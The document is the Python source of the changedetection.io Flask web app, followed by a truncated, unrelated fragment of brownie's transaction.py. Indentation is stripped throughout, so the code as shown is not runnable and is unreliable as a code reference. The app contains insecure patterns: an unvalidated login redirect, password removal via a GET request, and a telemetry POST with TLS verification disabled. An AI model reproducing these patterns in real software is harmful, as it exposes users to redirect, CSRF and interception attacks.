#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import flask_login
from flask_login import login_required
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_from_directory, abort, redirect, url_for, flash
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
from copy import deepcopy
__version__ = '0.39.5'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
# Needs to be set this way because we also build and publish via pip
base_path = os.path.dirname(os.path.realpath(__file__))
app = Flask(__name__,
static_url_path="{}/static".format(base_path),
template_folder="{}/templates".format(base_path))
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# Remember python is by reference
# populate_form in wtfors didnt work for me. (try using a setattr() obj type on datastore.watch?)
def populate_form_from_watch(form, watch):
for i in form.__dict__.keys():
if i[0] != '_':
p = getattr(form, i)
if hasattr(p, 'data') and i in watch:
setattr(p, "data", watch[i])
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def check_password(self, password):
import hashlib
import base64
# Getting the values back out
raw_salt_pass = base64.b64decode(datastore.data['settings']['application']['password'])
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password']:
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
next = request.args.get('next')
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(next or url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password loginif there is not one set
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
@app.route("/rss", methods=['GET'])
@login_required
def rss():
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
# Include a link to the diff page, they will have to login here to see if password protection is enabled.
# Description is the page you watch, link takes you to the diff JS UI page
base_url = datastore.data['settings']['application']['base_url']
if base_url == '':
base_url = "<base-url-env-var-not-set>"
diff_link = {'href': "{}{}".format(base_url, url_for('diff_history_page', uuid=watch['uuid']))}
# @todo use title if it exists
fe.link(link=diff_link)
fe.title(title=watch['url'])
# @todo in the future <description><![CDATA[<html><body>Any code html is valid.</body></html>]]></description>
fe.description(description=watch['url'])
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.data['has_unviewed'])
return output
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
import re
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_date = request.form.get('limit_date')
limit_timestamp = 0
# Re #149 - allow empty/0 timestamp limit
if len(limit_date):
try:
limit_date = limit_date.replace('T', ' ')
# I noticed chrome will show '/' but actually submit '-'
limit_date = limit_date.replace('-', '/')
# In the case that :ss seconds are supplied
limit_date = re.sub(r'(\d\d:\d\d)(:\d\d)', '\\1', limit_date)
str_to_dt = datetime.datetime.strptime(limit_date, '%Y/%m/%d %H:%M')
limit_timestamp = int(str_to_dt.timestamp())
if limit_timestamp > time.time():
flash("Timestamp is in the future, cannot continue.", 'error')
return redirect(url_for('scrub_page'))
except ValueError:
flash('Incorrect date format, cannot continue.', 'error')
return redirect(url_for('scrub_page'))
if confirmtext == 'scrub':
changes_removed = 0
for uuid, watch in datastore.data['watching'].items():
if limit_timestamp:
changes_removed += datastore.scrub_watch(uuid, limit_timestamp=limit_timestamp)
else:
changes_removed += datastore.scrub_watch(uuid)
flash("Cleared snapshot history ({} snapshots removed)".format(changes_removed))
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means that theres only one, so that there should be no 'unviewed' history availabe
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
def edit_page(uuid):
from changedetectionio import forms
form = forms.watchForm(request.form)
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'GET':
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
populate_form_from_watch(form, datastore.data['watching'][uuid])
if datastore.data['watching'][uuid]['fetch_backend'] is None:
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
if request.method == 'POST' and form.validate():
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
if form.minutes_between_check.data == datastore.data['settings']['requests']['minutes_between_check']:
form.minutes_between_check.data = None
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
form.fetch_backend.data = None
update_obj = {'url': form.url.data.strip(),
'minutes_between_check': form.minutes_between_check.data,
'tag': form.tag.data.strip(),
'title': form.title.data.strip(),
'headers': form.headers.data,
'body': form.body.data,
'method': form.method.data,
'fetch_backend': form.fetch_backend.data,
'trigger_text': form.trigger_text.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
'extract_title_as_title': form.extract_title_as_title.data
}
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid]['css_filter'] = form.css_filter.data.strip()
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
datastore.data['watching'][uuid].update(update_obj)
flash("Updated watch.")
# Re #286 - We wait for syncing new data to disk in another thread every 60 seconds
# But in the case something is added we should save straight away
datastore.sync_to_json()
# Queue the watch for immediate recheck
update_q.put(uuid)
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': form.url.data.strip(),
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
# Diff page [edit] link should go back to diff page
if request.args.get("next") and request.args.get("next") == 'diff':
return redirect(url_for('diff_history_page', uuid=uuid))
else:
return redirect(url_for('index'))
else:
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
# Re #110 offer the default minutes
using_default_minutes = False
if form.minutes_between_check.data == None:
form.minutes_between_check.data = datastore.data['settings']['requests']['minutes_between_check']
using_default_minutes = True
output = render_template("edit.html",
uuid=uuid,
watch=datastore.data['watching'][uuid],
form=form,
using_default_minutes=using_default_minutes,
current_base_url = datastore.data['settings']['application']['base_url']
)
return output
@app.route("/settings", methods=['GET', "POST"])
@login_required
def settings_page():
from changedetectionio import forms
from changedetectionio import content_fetcher
form = forms.globalSettingsForm(request.form)
if request.method == 'GET':
form.minutes_between_check.data = int(datastore.data['settings']['requests']['minutes_between_check'])
form.notification_urls.data = datastore.data['settings']['application']['notification_urls']
form.global_ignore_text.data = datastore.data['settings']['application']['global_ignore_text']
form.extract_title_as_title.data = datastore.data['settings']['application']['extract_title_as_title']
form.fetch_backend.data = datastore.data['settings']['application']['fetch_backend']
form.notification_title.data = datastore.data['settings']['application']['notification_title']
form.notification_body.data = datastore.data['settings']['application']['notification_body']
form.notification_format.data = datastore.data['settings']['application']['notification_format']
form.base_url.data = datastore.data['settings']['application']['base_url']
# Password unset is a GET
if request.values.get('removepassword') == 'yes':
from pathlib import Path
datastore.data['settings']['application']['password'] = False
flash("Password protection removed.", 'notice')
flask_login.logout_user()
return redirect(url_for('settings_page'))
if request.method == 'POST' and form.validate():
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['requests']['minutes_between_check'] = form.minutes_between_check.data
datastore.data['settings']['application']['extract_title_as_title'] = form.extract_title_as_title.data
datastore.data['settings']['application']['fetch_backend'] = form.fetch_backend.data
datastore.data['settings']['application']['notification_title'] = form.notification_title.data
datastore.data['settings']['application']['notification_body'] = form.notification_body.data
datastore.data['settings']['application']['notification_format'] = form.notification_format.data
datastore.data['settings']['application']['notification_urls'] = form.notification_urls.data
datastore.data['settings']['application']['base_url'] = form.base_url.data
datastore.data['settings']['application']['global_ignore_text'] = form.global_ignore_text.data
if form.trigger_check.data:
if len(form.notification_urls.data):
n_object = {'watch_url': "Test from changedetection.io!",
'notification_urls': form.notification_urls.data,
'notification_title': form.notification_title.data,
'notification_body': form.notification_body.data,
'notification_format': form.notification_format.data,
}
notification_q.put(n_object)
flash('Test notification queued.')
else:
flash('No notification URLs set, cannot send test.', 'error')
if form.password.encrypted_password:
datastore.data['settings']['application']['password'] = form.password.encrypted_password
flash("Password protection enabled.", 'notice')
flask_login.logout_user()
return redirect(url_for('index'))
datastore.needs_write = True
flash("Settings updated.")
if request.method == 'POST' and not form.validate():
flash("An error occurred, please see below.", "error")
output = render_template("settings.html", form=form, current_base_url = datastore.data['settings']['application']['base_url'])
return output
@app.route("/import", methods=['GET', "POST"])
@login_required
def import_page():
import validators
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
flash("{} Imported, {} Skipped.".format(good, len(remaining_urls)))
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
remaining="\n".join(remaining_urls)
)
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
@login_required
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
flash("Cleared all statuses.")
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
@login_required
def diff_history_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
flash("Not enough saved change detection snapshots to produce a report.", "error")
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
uuid=uuid,
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'],
extra_title=" - Diff - {}".format(watch['title'] if watch['title'] else watch['url']),
left_sticky= True )
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
@login_required
def preview_page(uuid):
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = [url_for('static_content', group='styles', filename='diff.css')]
try:
watch = datastore.data['watching'][uuid]
except KeyError:
flash("No history found for the specified link, bad link?", "error")
return redirect(url_for('index'))
newest = list(watch['history'].keys())[-1]
with open(watch['history'][newest], 'r') as f:
content = f.readlines()
output = render_template("preview.html",
content=content,
extra_stylesheets=extra_stylesheets,
current_diff_url=watch['url'],
uuid=uuid)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("static/images", path="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
@login_required
def get_backup():
import zipfile
from pathlib import Path
# Remove any existing backup file, for now we just keep one file
for previous_backup_filename in Path(app.config['datastore_path']).rglob('changedetection-backup-*.zip'):
os.unlink(previous_backup_filename)
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add the flask app secret
zipObj.write(os.path.join(app.config['datastore_path'], "secret.txt"), arcname="secret.txt")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
# Create a list file with just the URLs, so it's easier to port somewhere else in the future
list_file = os.path.join(app.config['datastore_path'], "url-list.txt")
with open(list_file, "w") as f:
for uuid in datastore.data['watching']:
url = datastore.data['watching'][uuid]['url']
f.write("{}\r\n".format(url))
# Add it to the Zip
zipObj.write(list_file,
arcname="url-list.txt",
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname, as_attachment=True)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
@login_required
def api_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if form.validate():
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
else:
flash("Error")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def api_delete():
uuid = request.args.get('uuid')
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def api_clone():
uuid = request.args.get('uuid')
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
@login_required
def api_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are rechecking.".format(i))
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
def notification_runner():
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
print("Watch URL: {} Error {}".format(n_object['watch_url'], e))
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Re #232 - Deepcopy the data incase it changes while we're iterating through it all
copied_datastore = deepcopy(datastore)
# Check for watches outside of the time threshold to put in the thread queue.
for uuid, watch in copied_datastore.data['watching'].items():
# If they supplied an individual entry minutes to threshold.
if 'minutes_between_check' in watch and watch['minutes_between_check'] is not None:
# Cast to int just incase
max_time = int(watch['minutes_between_check']) * 60
else:
# Default system wide.
max_time = int(copied_datastore.data['settings']['requests']['minutes_between_check']) * 60
threshold = time.time() - max_time
# Yeah, put it in the queue, it's more than time.
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
transaction.py
|
#!/usr/bin/python3
import functools
import sys
import threading
import time
from enum import IntEnum
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TimeExhausted, TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import ContractNotFound, RPCRequestError
from brownie.project import build
from brownie.project import main as project_main
from brownie.project.compiler.solidity import SOLIDITY_ERROR_CODES
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import EventDict, _decode_logs, _decode_trace
from .web3 import web3
def trace_property(fn: Callable) -> Any:
# attributes that are only available after querying the tranasaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status < 0:
return None
if self._trace_exc is not None:
raise self._trace_exc
try:
return fn(self)
except RPCRequestError as exc:
if web3.supports_traces:
# if the node client supports traces, raise the actual error
raise exc
raise RPCRequestError(
f"Accessing `TransactionReceipt.{fn.__name__}` on a {self.status.name.lower()} "
"transaction requires the `debug_traceTransaction` RPC endpoint, but the node "
"client does not support it or has not made it available."
) from None
return wrapper
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
class Status(IntEnum):
Dropped = -2
Pending = -1
Reverted = 0
Confirmed = 1
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
status: Transaction status: -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
revert_msg: Error string from reverted contract all
modified_state: Boolean, did this contract write to storage?"""
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs: Optional[List] = None
nonce = None
sender = None
txid: str
txindex = None
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
is_blocking: bool = True,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
is_blocking: if True, creating the object is a blocking action until the required
confirmations are received
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
if not self._silent:
print(f"\rTransaction sent: {color('bright blue')}{txid}{color}")
# this event is set once the transaction is confirmed or dropped
# it is used to waiting during blocking transaction actions
self._confirmed = threading.Event()
# internal attributes
self._call_cost = 0
self._trace_exc: Optional[Exception] = None
self._trace_origin: Optional[str] = None
self._raw_trace: Optional[List] = None
self._trace: Optional[List] = None
self._events: Optional[EventDict] = None
self._return_value: Any = None
self._revert_msg: Optional[str] = None
self._dev_revert_msg: Optional[str] = None
self._modified_state: Optional[bool] = None
self._new_contracts: Optional[List] = None
self._internal_transfers: Optional[List[Dict]] = None
self._subcalls: Optional[List[Dict]] = None
# attributes that can be set immediately
self.sender = sender
self.status = Status(-1)
self.txid = str(txid)
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
if self._revert_pc is not None:
self._dev_revert_msg = build._get_dev_revert(self._revert_pc) or None
self._await_transaction(required_confs, is_blocking)
def __repr__(self) -> str:
color_str = {-2: "dark white", -1: "bright yellow", 0: "bright red", 1: ""}[self.status]
return f"<Transaction '{color(color_str)}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[EventDict]:
if self._events is None:
if self.status:
# relay contract map so we can decode ds-note logs
addrs = {log.address for log in self.logs} if self.logs else set()
contracts = {addr: state._find_contract(addr) for addr in addrs}
self._events = _decode_logs(self.logs, contracts=contracts) # type: ignore
else:
self._get_trace()
# get events from the trace - handled lazily so that other
# trace operations are not blocked in case of a decoding error
initial_address = str(self.receiver or self.contract_address)
self._events = _decode_trace(self._raw_trace, initial_address) # type: ignore
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
